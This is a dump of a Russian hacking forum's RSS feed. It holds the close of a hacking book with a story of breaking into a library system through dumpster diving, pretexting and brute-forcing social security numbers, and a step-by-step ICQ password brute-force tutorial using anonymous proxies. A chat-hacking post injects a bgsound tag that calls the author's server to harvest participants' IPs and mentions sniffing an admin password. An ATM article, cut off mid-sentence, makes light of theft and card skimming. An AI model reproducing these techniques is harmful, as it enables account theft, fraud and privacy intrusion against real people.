						&lt;p&gt;Люди должны знать то, что они хотят знать, и нельзя скрывать от них информацию. Новые идеи должны публиковаться и обсуждаться. Знания должны доходить до людей. Технологии должны использоваться на благо людей, но не ради наживы и не в политических целях. Каждый человек должен иметь право на то, чтобы связанная с ним информация не использовалась во вред ему. Люди должны иметь право знать, если их личная информация внесена в базу данных, знать о том, кому и когда она отдается или продается. Они должны иметь право следить за тем, каким образом используется эта информация. Человек должен иметь право проверять информацию о самом себе, если она занесена в компьютерный файл или базу данных, и в этом ему не должны чиниться препятствия. Он должен иметь право беспрепятственно исправлять неточности в этих данных, и убирать оскорбительную для себя информацию. Аюди должны иметь гарантию, что те, кто создает и обслуживает базы данных, будут своевременно предоставлять им эти права.&lt;/p&gt;
						&lt;p&gt;Так должно быть, и в некоторых ситуациях эти права действительно имеют силу. Но большинство этих прав почти единодушно игнорируется. Значит, взломы необходимы.&lt;/p&gt;
						&lt;p&gt;Хакерство позволяет использовать компьютеры в соответствии с вышеперечисленными идеалами. Хакеры обладают идеалами относительно всех людей и всего человечества в целом, и у меня есть набор таких идеалов, которые лично я использую. Вот главные из них:&lt;/p&gt;
						&lt;p&gt;• Никогда и никаким образом не наноси вред ни компьютеру, ни программному обеспечению, ни системе, ни человеку, ничего не изменяй и не уничтожай.&lt;/p&gt;
						&lt;p&gt;• Если вред все же был нанесен, сделай все, что в твоих силах, чтобы исправить содеянное, и предотвратить подобное в будущем.&lt;/p&gt;
						&lt;p&gt;• Не позволяй ни себе, ни другим откровенно наживаться на взломах.&lt;/p&gt;
						&lt;p&gt;• Сообщай компьютерным менеджерам о наличии прорех в защите их компьютеров.&lt;/p&gt;
						&lt;p&gt;• Учи других, если тебя просят об этом, делись знаниями, если тебе есть чем делиться. Это не необходимость, но простая вежливость.&lt;/p&gt;
						&lt;p&gt;• Помни о своей уязвимости во всем, что касается компьютеров, включая секреты, которые тебе удалось узнать с помощью взломов.&lt;/p&gt;
						&lt;p&gt;• Будь осторожен. Проявляй настойчивость, но не делай глупостей и не рискуй понапрасну.&lt;/p&gt;
						&lt;p&gt;Я не хочу сказать, что следование этим принципам делает мои занятия хакерством моральными или правомочными. Но я также не считаю, что мое хакерство аморально. И я не стану выслушивать ничьих возражений по этому поводу. Мы-то знаем, что законно, а что — нет. Я собираюсь заниматься хакерством вне зависимости от того, насколько моральным я его считаю. И если у вас возникнет вопрос типа “Неужели вы действительно думаете, что этот ваш кодекс чести может оправдать что-нибудь вроде „вынюхивания&amp;quot;?”, значит, у вас в крови нет хакерства.&lt;/p&gt;
						&lt;p&gt;комбинирование принципов&lt;/p&gt;
						&lt;p&gt;В данной книге я попытался предложить основные указания по различным темам, которые подготовят вас к любой, связанной с компьютерами, ситуации, в которой вы можете оказаться.&lt;/p&gt;
						&lt;p&gt;Когда речь заходит о понятии “хакерства”, невозможно говорить о какой-то определенной последовательности шагов, которые следует предпринимать для достижения своих целей. Надо, скорее, выбрать основные идеи, дополнять их по мере необходимости, и взламывать до тех пор, пока что-то не выйдет. Зная, что вас ожидает, вы будете знать, как реагировать на очередное изменение, — и ваши хакерские способности только увеличатся. Я хочу рассказать вам еще одну, последнюю, историю. Она демонстрирует многое из того, о чем вы прочли в книге: исследования, копание в мусоре, подглядывание через плечо, упорство и логические рассуждения, программистские методы и методы грубой силы, общие знания о компьютерах, простую и обратную социальную инженерию, анализ экранов и модели систем. Эта история показывает, как все это вместе работает на конечный результат — удачный взлом.&lt;/p&gt;
						&lt;p&gt;“команда тигров” в моем лице&lt;/p&gt;
						&lt;p&gt;Недавно мне представилась возможность показать себя в хакерстве, взламывая только что установленную компьютерную систему специализированной библиотеки. Директор библиотеки был в курсе дела, поскольку они недавно обратились к этой новой системе, которая, в отличие от предыдущих, давала возможность получения коммутируемого доступа с внешних линий. Директор захотел узнать, возможно ли, находясь в режиме поиска, проникнуть в запретные зоны, имеющие дело с штрафами за просроченные книги, именами и адресами клиентов и можно ли вообще выйти из библиотечной программы в ОС? И многое-многое другое. Я сообщил ему, что буду счастлив разобраться с этой проблемой. Он предложил дать мне один из номеров для соединения с системой, но я отказался. Ведь я — хакер! (На самом деле я просто хотел произвести на него впечатление — я уже знал этот номер, когда он демонстрировал мне работу общедоступной части системы.)&lt;/p&gt;
						&lt;p&gt;Я вызвал систему из дома и изучил ее вдоль и поперек. Это была система, работавшая по командам. На экране я смог выбрать функцию, вводя такие команды, как CAT для поиска библиотечного каталога, и HOL, чтобы помечать пункты. Правильно завершать сеанс работы следовало с помошыо команды END. Я попробовал вводить другие, не указанные, команды. Очень часто бывает так, что часть системы является открытой, а часть —• секретной. Почти всегда общедоступная часть располагает по крайней мере одной секретной командой для входа в закрытую часть. Итак, я использовал множество ключевых слов: EXIT, BYE, LATER и т. д. Я видел, что некоторые из них используются в действующих прикладных программах. Так, команда LEAVE открывала доступ в специальную область для кураторов и сотрудников музея. Но ни одна из испробованных мною команд не сработала. Так как система была новой и не устоявшейся, я не сомневался, что в ней должна быть куча ошибок, которые я смогу обнаружить. В разговоре с директором он упомянул о том, что определенные функциональные клавиши на терминалах еще не установлены, и их нажатие означает провал в непонятную программную оболочку. Ага! Вот это-то мне и надо! Но, если вы вызываете систему по телефонной линии, вы не сможете добраться до функциональных клавиш. Я думал, что, возможно, функциональные клавиши являлись макросами команд, которые пользователь так или иначе должен вводить вручную, но я не знал этих команд.&lt;/p&gt;
						&lt;p&gt;Под покровом ночи я извлекал содержимое находящихся возле здания мусорных контейнеров в поисках полезной информации, и наконец нашел кое-что — ужасно изорванную брошюрку — документацию по интересующей меня системе. Лома я увидел, что среди перечисленных в карточке вешей были и имена команд, присвоенных функциональным клавишам. Одну-две из них можно было прочесть, остальные же прочесть не удалось. Но и двух было достаточно. Мне сразу стало ясно, что я исходил из неверных предпосылок — не ВСЕ команды представляли собой стандартные слова английского языка или аббревиатуры. Присутствовали и двузначные команды, и точечные. Вводя точечную команду, вы набираете сперва точку, а вслед за ней — буквенно-иифровую команду. Они часто используются в прикладных программах, когда непосредственный ввод буквенно-цифровой команды может быть истолкован как ввод данных. В программах часто используется точка перед командами, поскольку точка — простой, неприметный символ, который очень просто набрать. Но иногда в “точечных” командах используются и другие символы — слеш, апостроф и т. п. Из карточки я узнал, нажатие клавиши F1 соответствует команде .QUIT, a F2 — команде .HELP. Это показалось многообещающим — .QUIT могла давать доступ к закрытым областям, а помощи, скорее всего, вообще пока нет, так как система только что установлена. Возможно, эта функция&lt;/p&gt;
						&lt;p&gt;и ведет к остановке системы. Я вызывал компьютер по внешней линии, а через модем нажатие функциональных клавиш передать невозможно; так что мне оставалось надеяться на .QUIT и .HELP. Конечно, я уже пытался их вводить, но без точки. Может быть, теперь... Нет! Ничего! Команда .QUIT просто отсоединила меня от компьютера. В ответ на .HELP экран очистился, и на нем появилось следующее:&lt;/p&gt;
						&lt;p&gt;*EOF\txt\hlp\helpOOO* Я предположил, что это означало End Of File helpOOO в директории \txt\hlp, то есть файл существовал, но был пустым. Я тут же обрадовался — теперь я знаю о директориях текстовых файлов и файлов помощи. И я заметил еще кое-что:&lt;/p&gt;
						&lt;p&gt;каждый раз при смене экрана вверху появлялось нечто вроде:&lt;/p&gt;
						&lt;p&gt;*** J. Smith Co Special Library On-Line ***&lt;/p&gt;
						&lt;p&gt;(000)U,SYSv55.6 Три цифры в скобках изменялись в соответствии с тем, какую часть программы я использовал. Три нуля, возможно, означали открытый экран, где я пытался набирать не указанные в списке команды. Если я наберу команду .HELP вместе с номером экрана, допустим, (013), значит, решил я, система начнет искать файл “\txt\hlp\help013”. Так и случилось. Аля ввода эта система использовала, в том числе, и команды, сопровождающиеся номером. Мне стало интересно, подходит ли такой формат и для команд помощи. Я попробовал ввести “HELP99999”, надеясь, что такое большое число система просто не проглотит — ведь, такого экрана просто не может быть. В ответ я получил сообщение о неверной команде. Я попробовал другие варианты, но они тоже не сработали. Наконец, я снова набрал “HELP99999”, и на этот раз команда подействовала! Наверно, в первый раз я сделал ошибку. Теперь система полетела, и я оказался в отладочной среде программы. Это было нечто вроде мини-системы для редактирования текстовых и командных файлов. Я не нашел в ней ничего ценного, кроме копирайта с первыми буквами названия компании, выпустившей программу. Я просмотрел несколько каталогов компаний по производству программного обеспечения, пытаясь расшифровать аббревиатуру, и наконец мне это удалось. Позвонив туда, я выяснил, что именно они написали интересующую меня программу. Я попросил прислать мне запасную документацию к пакету. Конечно, сказали они, просто вышлите нам серийный номер своей программы, и они вышлют мне книгу за соответствующую плату. Я попытался схитрить, но не тут-то было: секретарша сообщила, что серийный номер можно найти на ярлыке инсталляционных дискет. “У меня сейчас нет дискет... Я звоню из машины. Я уверен, что высылал свою карточку, может, вы проверите? Меня зовут Ажонатан Смит из ...” Я молил бога, чтобы настоящий J. Smith посылал им свою карточку. Но — нет. Мне пришлось сказать, что я перезвоню на следующий день. Я решил, что в библиотеке компании должна быть эта документация, но не мог же я там появиться и попросить директора дать мне ее на время. Я должен был действовать как независимый хакер. Пришло время серьезно заняться социальной инженерией. Директор для этой цели не годится — он знает мой голос. Все, что мне было надо, — это серийный номер. Я позвонил секретарше библиотеки и сказал, что я — программист из компании, которая установила им новую компьютерную систему, и хотел бы знать, нет ли у них восьмой версии программы? Этого она, конечно, не знала, но я вежливо объяснил, что ей нужно просто найти несколько дискет с приклеенными на них ярлычками... Найдя их в директорском офисе, она сообщила мне серийный номер. Одной из его цифр оказалась восьмерка, и я сказал ей, что все верно, и я просто хотел убедиться, что компания поставила им самую новую версию, и как только появится девятая версия, мы пошлем ее им.&lt;/p&gt;
						&lt;p&gt;Я больше суток разбирался в отладочной документации. Я обнаружил, как можно обойти программное окружение и как — самое главное! — выйти из него. Выйдя из отладки, я оказался перед приглашением к загрузке. Нажав в ответ “circ” и “JSC” — J. Smith Co. — я вошел внутрь. Разумеется, здесь я привожу вымышленное имя. После ввода верного пароля я оказался на втором уровне зашиты — circ,JSC была общая входная комбинация, известная любому легальному пользователю. Я знал, что означает “ваш личный девятизначный код”. Номер социальной безопасности! Я знал, где родился и вырос директор, так что первые три цифры у меня были. Я написал программу для перебора последних шести цифр, и вскоре нашел верную комбинацию. Мне выдали сообщение: “Добрый вечер, Ажейн Торнбакл! Пожалуйста, введите ваш личный пароль”. Директора звали иначе. Теперь мне был нужен пароль Ажейн. Я снова попробовал метод грубой силы, но безрезультатно. Я не знал, кто такая Ажейн Торнбакл, но у меня была извлеченная из мусора пачка рекламных проспектов компании. А вот и ответ: Торнбакл оказалась сотрудницей отдела службы управления информацией — то есть программистом. Вычислить ее пароль мне так и не удалось; продолжив перебирать номера социальной безопасности, я опять вышел на номер директора библиотеки. Итак, чего я достиг? Программная оболочка — вещь интересная, и я научился с ее помощью как угодно редактировать файлы и т. п. Я сумел использовать одну из отладочных команд поиска для обнаружения слова “circ” в файлах системы. В одном из них среди абракадабры я обнаружил слово “minicirc”, а затем “circ”. Я попытался расшифровать абракадабру, идущую после “circ”, думая, что это зашифрованное “JSC”, и надеясь таким образом найти ключ к абракадабре после “minicirc”. Безрезультатно. Вернувшись к входному приглашению, я попытался использовать “minicirc” с различными паролями. Проблема была в том, что я не знал, что такое “mini”. Я подумал, что это может быть модель программы или руководство. Наконец, я нашел верный пароль — T.CIRC1. Он-то и привел меня к заветному сообщению: “Пожалуйста, введите вам личный девятизначный идентификационный код”. Через несколько секунд я нашел нужный номер, и экран очистился. “Доброе утро, Новый Пользователь!” — появились на нем слова. — “Пожалуйста, введите ваш личный пароль”. Я надеялся, что это — последний уровень зашиты. И точно: через несколько мгновений мне удалось войти, использовав пароль “TRAIN”. Я гордился собой — я взломал-таки закрытую часть системы. Но приключения еще не закончились — ведь “minicirc” была всего лишь учебной моделью настоящей системы. Ее можно было использовать для проверки книг для выдачи посетителям, регистрации новых посетителей, поиска в базах данных и т. д. Но в базе данных содержались только вымышленные имена и адреса. Многие другие свойства системы были бесполезны, но мне помогло само их наличие.&lt;/p&gt;
						&lt;p&gt;Там была электронная лоска объявлений, на которой инсталлировавшие программу оставили несколько стандартных сообшений-приветствий. Прочитав их, я узнал немало полезного. Каждое сообщение открывалось списком пославших его, и тех, кому оно предназначалось. Я заключил, что можно посылать сообщения из “minicirc” в “circ”, и наоборот. Во-вторых, там оказались сообщения, предназначавшиеся одному пользователю, но по ошибке посланные всем. С помошью текстового редактора я написал письмо и лично послал его. Затем вышел, перезвонил и снова оказался в программной оболочке. Использовав редакторы отладчика, я нашел написанное мною письмо, и изменил его содержание, адресовав его директору библиотеки. Свое имя, под которым хранился файл, — “Новый Пользователь” — я изменил на фиктивное имя представителя компании, произведшей программное обеспечение. В послании содержалась просьба к директору позвонить этому представителю для разговора насчет новой, девятой, версии — обратная инженерия! Телефонный номер, который я дал директору, принадлежал одному моему другу, которому я кратко объяснил, как действовать в случае, если директор позвонит. На всякий случай мы установили автоответчик. Когда директор позвонил, мой друг немного рассказал о новых разработках, а затем задал несколько технических вопросов о способе, с помошью которого в библиотеке была инсталлирована программа. Директор не знал этого, но сказал, что может посмотреть у себя на терминале, загрузившись в систему... “Отлично”, — сказал мой друг. — “Делайте все то же, что обычно. Circ. JSC. Так, номер... Кстати, вы используете все тот же личный пароль?” “Ну да, „Firebird&amp;quot;. Ну вот, я загрузился...” Итак, последний шаг оказался самым легким.&lt;/p&gt;
						&lt;p&gt;Для завершения проекта мы стали думать, что же можно сделать, используя директорский системный доступ. Оказалось, что сделать можно многое. Покинув данный уровень, мы вышли на сетевой сервер, а оттуда загрузились в один из главных компьютеров, используя имя и пароль директора. Под конец, для подтверждения своего успеха, я использовал редактор интерактивного отладчика и изменил программу так, чтобы вместо пояснений к командам она выдавала на экран непристойную шутку. Затем я оставил файл в директории директора библиотеки, в котором объяснил, каким образом был совершен взлом.&lt;/p&gt;
						&lt;p&gt;комбинирование принципов&lt;/p&gt;
						&lt;p&gt;Если вы хотите быть по-настояшему удачливым хакером, вы должны стать “хакером на все руки”. Недостаточно хорошо владеть методами социальной инженерии, или быть гением-программистом, и т. д. Вы должны обладать всеми этими навыками в совокупности с богатым воображением и установкой на конкретные цели. Плюс этика. Я действительно считаю, что хакерство без этики не ведет ни к чему хорошему — если вы будете причинять неприятности другим, то неприятности вскоре начнутся и у вас. Присутствовала ли этика в описанном мною взломе? Конечно — ведь я просто переименовал экранный файл, а неприличную шутку поместил в другой, под прежним именем. Позднее мы вместе с директором и программистами компании вместе обсудили план действий по заделыванию дыр в защите системы.&lt;/p&gt;
						&lt;p&gt;мысли в заключение&lt;/p&gt;
						&lt;p&gt;Спросите мудреца о цели существования вселенной, или еще что-нибудь в том же духе — и он ответит:&lt;/p&gt;
						&lt;p&gt;— Этого нельзя выразить словами. Я знаю ответ, я его чувствую, но неописуемое словами не опишешь. “Ну и чушь!” — подумаете вы. Конечно. Но вместе с тем это правда. Мудрец действительно верит в то, что знает обо всех тайнах вселенной, но вы этого не поймете, пока сами не почувствуете то же самое. Вот ваш проводник в мире хакерства, лежащем за пределами этой книги. Из книги вы узнали идеи, методы и факты, которые позволят вам начать заниматься хакерст-вом, сводя к минимуму возможность совершения ошибок. Но это еще не все. Это хобби (игра? профессия?) требует, как и любое хобби, времени, сил, практики и еще, и еще, до тех пор, пока у вас все не начнет получаться так, как вы хотите.&lt;/p&gt;
						&lt;p&gt;несколько советов обеспокоенным администраторам&lt;/p&gt;
						&lt;p&gt;Если же вы прочли эту книгу с точки зрения соблюдения закона и обеспечения компьютерной безопасности — что ж, теперь вы знаете множество способов взлома самых “непробиваемых” систем. Вы, наверное, уже составили список мер, которые примете против описанных мною методов. Объясните вашим пользователям, что никогда нельзя открывать никакую конфиденциальную информацию по телефону, по почте или в режиме онлайн. В ответ на просьбу открыть пароль следует отвечать просто: “в этом я не смогу вам помочь”. Нельзя раскрывать имена или телефонные номера, адреса электронной почты иди физические адреса. Если человек спрашивает такие веши, он, скорее всего, является хакером.&lt;/p&gt;
						&lt;p&gt;Установите правила, по которым легальные пользователи задавали бы вопросы любому подозрительному типу, шатающемуся по офисам. Но не стоит и слишком давить на пользователей проблемами безопасности. Если вы проявите излишнюю бдительность — например, поменяете все пароли, — пользователи могут вас не понять. Объясните им, что они потеряют, если компьютерная безопасность будет нарушена. Убедите их, что это важно для всех сотрудников организации. Чтобы убедиться в нерушимости зашиты на все 100%, возьмите за правило регулярную проверку и очистку компьютеров. Найдите и залатайте дыры в защите вашей системы. Уберите все отладочные опции, которые могут быть причиной появления таких дыр. Если вы увольняете сотрудника, немедленно сотрите его доступ и поменяйте код всех остальных. Существует специальная литература о мерах по компьютерной безопасности, которые должен предпринять администратор. Прочтите ее. Немного хорошей работы — и ваш труд не пропадет зря.&lt;/p&gt;
						&lt;p&gt;несколько советов обеспокоенным хакерам&lt;/p&gt;
						&lt;p&gt;Вы прочли всю книгу, и все еще сомневаетесь в успехе? Я гарантирую вам — если вы прилежно обучаетесь хакерству, вы станете настоящим мастером этого искусства. Даже если вам пока не удалось совершить ни единого взлома, вы все же можете считать себя настоящим хакером — ведь у вас благородные намерения, вы соблюдаете правила хакерской безопасности, вы не станете вредить системе, которую взломаете, и вы стремитесь наслаждаться жизнью во всей ее полноте. А все это и есть хакерство. Поздравляю вас и желаю удачи: теперь вы знаете все Секреты Супер-Хакера! То есть ваши секреты.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (admin)</author>
			<pubDate>Wed, 05 Aug 2009 14:14:51 +0400</pubDate>
			<guid>http://hackzona.youbb.ru/viewtopic.php?pid=38#p38</guid>
		</item>
		<item>
			<title>Взлом ICQ UIN при помощи IPDbrute 2 Lite</title>
			<link>http://hackzona.youbb.ru/viewtopic.php?pid=37#p37</link>
			<description>&lt;p&gt;В этой статье я решил описать метод получения ICQ UIN, которым я иногда пользуюсь. Для начала нам понадобятся две софтинки: IPDbrute2 Lite и UIN;PASS Generator_v1.4&lt;br /&gt;1. Запускаем UIN;PASS Generator v1.4. Он нам нужен для создания файла со списком ICQ ; pass, который понимает программа IPDBrute 2 Lite &lt;/p&gt;
						&lt;p&gt;В поле &amp;quot;Делать с&amp;quot; - вводим номер ICQ, с которого мы начнем генерировать список в этой программе.&lt;br /&gt;В следующем поле вводим конечный номер ICQ.&lt;br /&gt;В поле &amp;quot;Делать каждые&amp;quot; оставляем 1.&lt;br /&gt;В поле &amp;quot;записывать в&amp;quot; вводим название файла, в который будут записываться сгенерированные UIN - ы и пароли.&lt;br /&gt;В качестве разделителя используем предложенный по умолчанию &amp;quot;;&amp;quot;.&lt;br /&gt;В поле &amp;quot;пароль&amp;quot; вписываем пароль, который будет подставляться при взломе ( например, 12345 ).&lt;br /&gt;Если у вас имеется хороший словарь паролей, то путь к нему можно указать в следующем поле &amp;quot;Лист паролей&amp;quot;.&lt;br /&gt;Нажимаем кнопку &amp;quot;Create&amp;quot;.&lt;br /&gt;Программа уведомит вас об окончании своей работы.&lt;/p&gt;
						&lt;p&gt;2. В Интернете ищем списки анонимных прокси и копируем их в текстовый файл. Чем больше, тем лучше. Почему? Да потому, что прокси сервера имеют склонность закрываться и в вашей базе уже будет больше половины неработающих серверов.&lt;/p&gt;
						&lt;p&gt;3. Запускаем программу IPDBrute 2 Lite. Для начала, нам нужно настроить IPDBrute 2 Lite - нажимаем кнопку &amp;quot;Config...&amp;quot;. &lt;br /&gt; &lt;/p&gt;
						&lt;p&gt;Source uin;pass list file: - путь к файлу, который мы сгенерировали при помощи UIN;PASS Generator v1.4.&lt;br /&gt;Dump incorrect passwords to this file: - cюда будут записываться список ась с паролями, которые вы не смогли взломать.&lt;br /&gt;Dump correct passwords to this file: - cюда будет записываться список ась с паролями, которые вы взломаете.&lt;br /&gt;Threads: - количество потоков, по которым работает программа. Это зависит от скорости вашего Интернета. Я на модеме ставлю 20-30 ( у меня Интернет дохлый ), попробуйте разные числа и найдите оптимальное для вашего соединения. Рекомендую начать с 50.&lt;br /&gt;Cleanup every: 30 minutes - убираем эту галочку.&lt;br /&gt;Proxies list file: - путь к файлу с адресами анонимных прокси серверов.&lt;br /&gt;Далее жмем на кнопку &amp;quot;OK&amp;quot;.&lt;br /&gt;Теперь жмем кнопку &amp;quot;Start&amp;quot; и идем пить кофе или спать с красивой девушкой, а ICQ номера, которые ты взломал, будут писаться в good.txt.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (admin)</author>
			<pubDate>Wed, 05 Aug 2009 14:13:18 +0400</pubDate>
			<guid>http://hackzona.youbb.ru/viewtopic.php?pid=37#p37</guid>
		</item>
		<item>
			<title>Взлом html-чатов</title>
			<link>http://hackzona.youbb.ru/viewtopic.php?pid=36#p36</link>
			<description>&lt;p&gt;Я предполагаю, что читатель знает, что такое CGI, и на этом построю своё объяснение. &lt;/p&gt;
						&lt;p&gt;Начал я с малого. &lt;/p&gt;
						&lt;p&gt;В любом чате фрейм, в котором ты пишешь сообщения, генерится динамически (для каждого входящего) и, возможно, содержит несколько скрытых полей. Типа &amp;lt;input type=hidden name=cookie value=SP202134&amp;gt; (так в партизанах хранится UserID) &lt;/p&gt;
						&lt;p&gt;Идея в следующем: сохраняем содержимое этого фрейма на диске и исправляем его так, что бы можно было с ним работать со своего винта. Т.е. заменяем ссылки типа /cgi-bin/refresh.pl на полный путь wwwchat.nsk.su/cgi-bin/refresh.pl и вместо скрытых полей формы пишем типа &amp;lt;input type=text name=cookie value=SP202134&amp;gt; (что бы можно было их изменять) После этого делаем HTML документ для &amp;quot;сборки чата&amp;quot; из кусков. Т.е. примерно так &lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160;&amp;quot;First.htm&amp;quot;&lt;br /&gt;&amp;lt;html&amp;gt;&lt;br /&gt;&amp;lt;frameset rows=&amp;quot;80%,20%&amp;quot;&amp;gt;&lt;br /&gt;&amp;#160; &amp;#160;&amp;lt;frameset cols=&amp;quot;70%,30%&amp;quot;&amp;gt;&lt;br /&gt;&amp;#160; &amp;#160; &amp;lt;frame name=&amp;quot;razg&amp;quot;&lt;br /&gt;&amp;#160; &amp;#160; src=&amp;quot;http://www.chat.nsk.su/cgi-bin/refresh.cgi?win+razgovor+nocookie#end&amp;quot;&amp;gt;&lt;br /&gt;&amp;#160; &amp;#160; &amp;lt;frame name=&amp;quot;rigt&amp;quot; src=&amp;quot;http://www.chat.nsk.su/right.html&amp;quot;&amp;gt;&lt;br /&gt;&amp;#160; &amp;#160;&amp;lt;/frameset&amp;gt;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160;&amp;lt;frame name=&amp;quot;bot&amp;quot; src=&amp;quot;start.htm&amp;quot;&amp;gt;&lt;br /&gt;&amp;lt;/frameset&amp;gt;&lt;br /&gt;&amp;lt;/html&amp;gt;&lt;/p&gt;
						&lt;p&gt;Start.htm - это и есть тот фрейм который я сохранил и изменил &lt;/p&gt;
						&lt;p&gt;После этого я просто броузером открывал эту страницу (First.htm). И сразу(!!!) попадал в чат, минуя стандартную процедуру входа. Это позволило : &lt;br /&gt;1. Обходить зарегистрированные имена &lt;br /&gt;2. Прятать свой IP от киллеров, за счет взятия чужого ID&#039;a &lt;/p&gt;
						&lt;p&gt;Дальше мне стало интересно вычислить IP участников. Я обнаружил, что не запрещён тэг &amp;lt;bgsound src=&amp;quot;&amp;quot;&amp;gt;. Это позволило вставлять в своё сообщение ресурс со своей машины. Сам по себе звук на хер не нужен, но этот косяк позволил вставить в свой месс строку типа &amp;lt;bgsound src=&amp;quot;http://MyIP/cgi-bin/spy.exe&amp;quot;&amp;gt;. Этот скрипт (spy.exe) вызывался с машины КАЖДОГО участника чата. Это позволило увидеть IP всех (скрипт просто сохранял мне на винт данные из переменной окружения REMOTE_ADDR). Это мне не очень понравилось, тк не понятно было где чей IP. Примерно в это-же время в чате появились приваты. Это значит, что документ в главном фрейме (тот где мессы все) стал называться по другому. &lt;/p&gt;
						&lt;p&gt;До приватов : &lt;br /&gt;&lt;a href=&quot;http://www.chat.nsk.su/cgi-bin/refresh.cgi?win+razgovor#end&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.chat.nsk.su/cgi-bin/refresh. &amp;#8230; zgovor#end&lt;/a&gt; &lt;/p&gt;
						&lt;p&gt;После появления приватов : &lt;br /&gt;&lt;a href=&quot;http://www.chat.nsk.su/cgi-bin/refresh.cgi?win+razgovor+SP345678#end&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.chat.nsk.su/cgi-bin/refresh. &amp;#8230; 345678#end&lt;/a&gt; &lt;/p&gt;
						&lt;p&gt;Где SP456789 - UserID &lt;/p&gt;
						&lt;p&gt;После этого в скрипт (spy.exe) был добавлен вывод ID&#039;a из переменной окружения HTTP_REFERER Ну а сопоставить ник с ID&#039;ом не проблемма, тк ID каждого прописан там же примерно в такой строке &lt;br /&gt;&amp;#160; &amp;#160;&amp;lt;br&amp;gt;&amp;lt;b&amp;gt;&amp;lt;font color=yellow size=-1&amp;gt;Тут ник&amp;lt;/font&amp;gt;&amp;lt;/b&amp;gt;&lt;br /&gt;&amp;#160; &amp;#160;&amp;lt;font color=black&amp;gt;&amp;lt;a href=&amp;quot;/cgi-bin/private_form.cgi?SP448188&amp;quot;&amp;gt;&lt;br /&gt;&amp;#160; &amp;#160;&amp;lt;img src=/img/mes.gif border=0 vspace=0&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/font&amp;gt;&lt;/p&gt;
						&lt;p&gt;(Это строка взята из правого фрейма, где можно вызвать функцию &amp;quot;Кто в чате&amp;quot;) &lt;/p&gt;
						&lt;p&gt;После этого перестало быть проблемой сопоставление ника и IP. Затем я решил позабавиться с приватами. &lt;/p&gt;
						&lt;p&gt;Используя метод сохранения странички на винт (описанный выше), я получил форму для отправления приватов от КОГО-ТО КОМУ-ТО. Т.е. я смог в отсылаемом приватно сообщении проставлять имя отправителя. &lt;/p&gt;
						&lt;p&gt;Осталось только одно. Я знал, что в чате есть киллеры, но ничего не знал про то, что это, где это, как это. Знал только, что для того, чтобы киллерствовать надо зайти на какую-то страничку. Очевидно, что в этой киллерской страничке показываются имена. Я предположил, что моё имя показываются таким, каким я его ввожу. Исходя из этого, я под именем &amp;lt;bgsound src=&amp;quot;http://MyIP/cgi-bin/spy.exe&amp;quot;&amp;gt; MyNick зашел в чат (через прокси), и начал легонько ругаться (мне надо было, чтобы киллеры зашли на свою страничку). После этого (когда меня убили) я разгреб лог моего ВебСервера (OmniHTTPd beta) и увидел там обращение со страници не относящейся к известным мне страницам чата. Я полез на эту страницу и получил запрос на ввод пароля, со словами &amp;quot;Дорогой администратор...&amp;quot;. Это приятно согрело душу. Дальше я начал думать, то ли подобрать пароль, то ли ещё что придумать. Но ситуация так сложилась, что я оказался в одной сети с киллером, и, запустив сниффер, я поимел пароль. &lt;/p&gt;
						&lt;p&gt;Ну вот и все. &lt;/p&gt;
						&lt;p&gt;With best regards, Maveric. &lt;/p&gt;
						&lt;p&gt;P.S. Ни один из этих приколов уже не работает в партизанах, т.к. это был &amp;quot;дружественный взлом&amp;quot; и обо всем, что я нашел, я рассказал создателю чата. Он все косяки исправил.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (admin)</author>
			<pubDate>Wed, 05 Aug 2009 14:12:17 +0400</pubDate>
			<guid>http://hackzona.youbb.ru/viewtopic.php?pid=36#p36</guid>
		</item>
		<item>
			<title>Взлом банкоматов</title>
			<link>http://hackzona.youbb.ru/viewtopic.php?pid=35#p35</link>
			<description>&lt;p&gt;Банковские автоматы и кредитные карточки уже давно появились на улицах больших городов и постепенно начинают входить в нашу жизнь. Что есть банкомат с точки зрения хакера? Правильно, источник халявы и быстрого способа заработать немного карманных деньжат. Ведь если украсть десяток--другой долларов, кто будет вас искать?&lt;/p&gt;
						&lt;p&gt;От банковских работников я слышал, что оправданными с финансовой точки зрения будут поиски похитителя, умыкнувшего в свой карман по крайней мере 300 вечнозеленых.&lt;/p&gt;
						&lt;p&gt;Уменьшим эту цифру вдвое для безопасности и примем полученные полтораста баксов в качестве того потолка, заходить за который не стоит даже в том случае, если очень--очень хочется купить новый микропроцессор или материнскую плату, а к ним быстрый модем впридачу.&lt;/p&gt;
						&lt;p&gt;Впрочем, с юридической точки зрения похищение даже одного доллара - кража. Поэтому, прежде чем отправляться к ближайшему банкомату с кусачками и отверткой, запаситесь на всякий случай парой адвокатов и захватите Шварценеггера на тот случай, чтобы немножко попридержать службу безопасности банка, пока вы будете сматывать удочки. Для того чтобы получить деньги, мало найти потерянную карточку и вставить ее в прорезь автомата. Нужно ввести с клавиатуры определенный код, на карточке не написанный и хранящийся у клиента в голове. Сама по себе карточка без него бесполезный кусок пластика. К тому же ее бывший владелец, как только обнаружит пропажу, немедленно позвонит в банк, и у карточки будет выставлен знак изъятия. Другими словами, она исчезнет в недрах банкомата и уже больше никогда не попадет к вам в руки. Следовательно, нужно не только найти карточку, но еще и подсмотреть вводимый ее владельцем пароль и снять со счета требуемую сумму еще до того, как тот обнаружит пропажу.&lt;/p&gt;
						&lt;p&gt;Впрочем, если мы уж сумели подсмотреть пароль, то и карточку воровать совершенно необязательно. Достаточно ее считать. Что и сделали в свое время ребята из Эстонии. История шумная и известная почти каждому кардеру. В дорогих ресторанах официант, пока нес карточку клиента, успевал ее считать портативным устройством размером с пачку от сигарет, изготовленным из обычной магнитофонной головки, батарейки, усилителя сигналов и записывающего устройства. Ошибка горячих эстонских парней заключалась в том, что они грабили часто и помногу. Другими словами, в жадности. А вот в другой истории злоумышленникам повезло больше. Как-то раз на малолюдной улице одного небольшого городка появился новый банкомат. Естественно, нашлись такие, что пожелали им воспользоваться. Опускают в него карточку, вводят нужный пароль. Ждут себе ждут, а банкомат им отвечает: извините, мол, нету денег, или связи - в общем, выдает неподозрительное объяснение невозможности выдачи денег. В банке долго понять не могли - как совершается кража? Почему-то никому и в голову не могла придти мысль, что этот банкомат-то 